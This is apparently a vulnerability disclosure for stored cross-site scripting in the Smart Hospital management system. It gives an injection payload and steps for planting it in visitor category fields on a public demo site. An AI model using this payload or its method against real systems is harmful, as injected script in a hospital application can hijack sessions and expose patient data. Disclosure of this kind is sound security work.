# Title: Smart Hospital : Hospital Management System - Multiple XSS
# Author: @Eawhitehat - Eren Arslan
# Demo available : https://demo.smart-hospital.in/frontend
# CVE: N/A
# XSS
# Screenshot : https://prnt.sc/2vL46MTZ3ktK
Used Payload :
}}</script><script>alert(/eawhitehat is here/);</script></body></html><!--
Method :
Connect to panel with "SUPER ADMIN" : https://demo.smart-hospital.in/site/login#
#Vulnerabîlity
1. After login with SUPER ADMIN, go to https://demo.smart-hospital.in/admin/visitors#
2. Add "New Visitor" and paste the payload in category NAME and NOTE
3. Reload the Category List page and welcome your XSS
Affected page :
All page !